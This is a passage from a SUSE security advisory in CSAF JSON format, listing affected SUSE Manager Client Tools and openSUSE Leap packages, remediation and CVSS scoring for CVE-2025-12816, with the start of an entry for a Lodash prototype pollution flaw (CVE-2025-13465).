"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-12816",
"url": "https://www.suse.com/security/cve/CVE-2025-12816"
},
{
"category": "external",
"summary": "SUSE Bug 1255584 for CVE-2025-12816",
"url": "https://bugzilla.suse.com/1255584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2025-12816"
},
{
"cve": "CVE-2025-13465",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-13465"
}
],
"notes": [
{
"category": "general",
"text": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
